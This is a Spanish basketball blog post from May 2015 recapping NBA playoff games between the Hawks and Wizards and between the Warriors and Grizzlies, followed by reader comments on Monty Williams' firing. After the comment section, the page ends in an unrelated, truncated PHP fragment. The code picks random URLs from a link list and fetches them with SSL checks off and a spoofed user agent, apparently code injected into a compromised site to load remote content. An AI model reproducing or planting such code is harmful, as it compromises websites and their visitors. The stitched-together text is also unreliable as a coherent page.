La Crónica: A tiempo

12 de May de 2015 por TheDeerHunter

Volvieron las versiones dominantes de los mejores equipos de la regular y lo hicieron antes de que la situación se les escapara del todo de las manos. Aun así los Hawks sufrieron para igualar la serie en Washington con un triple que Pierce no tuvo esta vez la fortuna de embocar. Los Warriors y Stephen Curry, en cambio, se mostraron intratables en el segundo partido en Memphis.

Hawks 106 – Wizards 101

Pudimos reconocer por esta vez al mejor equipo del Este, a esa escuadra equilibrada y solvente, ese movimiento de balón escuela Popovic, entregada defensa y esa característica peligrosidad generada desde todas las zonas de la cancha. El yunque siempre fue la gran pareja interior con la que cuentan. Hasta la fecha pocas veces ha podido imponerse durante esta postemporada, pero anoche Millsap y Horford comenzaron arrolladores en el primer cuarto con un 18-2 frente a sus pares. Igualito que en el anterior partido. Como decimos, el equipo de Budenholzer recuperó su excelente distribución y su equilibrio dentro-fuera, rozando un 50% en triples.

No obstante, faltó mayor eficacia defensiva. Ausente Wall, Paul Pierce volvió a estar imparable (superando a Dennis Johnson en el puesto 20 de la lista histórica de anotadores en playoffs) y Bradley Beal firmó el partido de su vida con 34 puntos, 6 rebotes, 7 asistencias, 3 robos y 1 tapón.

Las dudas aparecieron en el tramo final, donde los Wizards amenazaron el resultado. Fue Jeff Teague entonces quien logró llevar la nave a buen puerto con sus 26 puntos, incluido un triple definitivo a un minuto del final, y 8 asistencias. La tuvo Pierce con un triple para empatar con 10 segundos en el reloj. Esta vez no entró.

Warriors 101 – Grizzlies 84

Stephen Curry volvió a su versión MVP (3er partido por encima del 30-5-5, más que nadie estos playoffs) el tiro exterior volvió a funcionar (por encima del 40%) y la defensa se limitó a poner de manifiesto los problemas ofensivos de los locales (con 11 robos y 10 tapones, eso sí). El equipo de Kerr salió a la pista dispuesto a demostrar porqué no han perdido 3 partidos seguidos este año. El primer gran parcial de los Warriors fue con Curry dedicado exclusivamente a labores de distribución. Su primer lanzamiento (errado) fue a 3 minutos del final del primer cuarto, favoreciendo una sólida actuación de sus compañeros Green, Thompson y Barnes, con interesante aportación de Iguodala. Curry, después, se fue a 33 puntos, 8 rebotes, 5 asistencias y 2 robos. El concepto de fluir…

No es nada fácil doblegar a este equipo y menos si no sales al 100% de tus capacidades. Sólo reconocimos remotamente a Marc Gasol del equipo que le había dado la vuelta a la serie en los 2 partidos anteriores. Tampoco él estuvo particularmente fino mirando a aro. Colapsó el ataque en un 37.5 en %TC y un paupérrimo acierto en triples. Apenas superaron a sus rivales por dos rebotes bajo aros. No era la noche. Toca volver a remar en contra.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    No sé por qué no puedo ver ni vuestro índice temporal a la derecha, ni acceder a la previa de los Pelicans desde el menú de previas 2014/2015

    La noticia: Monty Williams, despedido de Pelicans tras 5 años.

    ¿Y esto? Entrar en PO creo que ha estado bien. Davis se ha desarrollado. Han tenido muchas lesiones. Perder 4-0 creo que era previsible, quizá pudieron arañar alguna en casa…

    No lo entiendo mucho :S

      Citar

  2. Azabel dice:
    #2

    Jose Luis:
    No sé por qué no puedo ver ni vuestro índice temporal a la derecha, ni acceder a la previa de los Pelicans desde el menú de previas 2014/2015

    La noticia: Monty Williams, despedido de Pelicans tras 5 años.

    ¿Y esto? Entrar en PO creo que ha estado bien. Davis se ha desarrollado. Han tenido muchas lesiones. Perder 4-0 creo que era previsible, quizá pudieron arañar alguna en casa…

    No lo entiendo mucho :S

    inaceptable, metio al equipo en PO a pesar de tener dos bajas muy sencibles todo el curso como holiday y Anderson, habria que haberlos visto todo el curso con ellos dos y seguramente hubiesen sido incluso mejores

    habra que ver a quien ficha, si es uno bueno excelente, si es una apuesta que se pudran

      Citar

  3. Jose Luis dice:
    #3

    Azabel: inaceptable, metio al equipo en PO a pesar de tener dos bajas muy sencibles todo el curso como holiday y Anderson, habria que haberlos visto todo el curso con ellos dos y seguramente hubiesen sido incluso mejores

    habra que ver a quien ficha, si es uno bueno excelente, si es una apuesta que se pudran

    Davis también estuvo bastante tocado… en fin, veremos. A priori, no me gusta.

      Citar

  4. Ruxixón dice:
    #4

    A la caza de Thibodeau.Va a estar bonito el baile de entrenadores

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>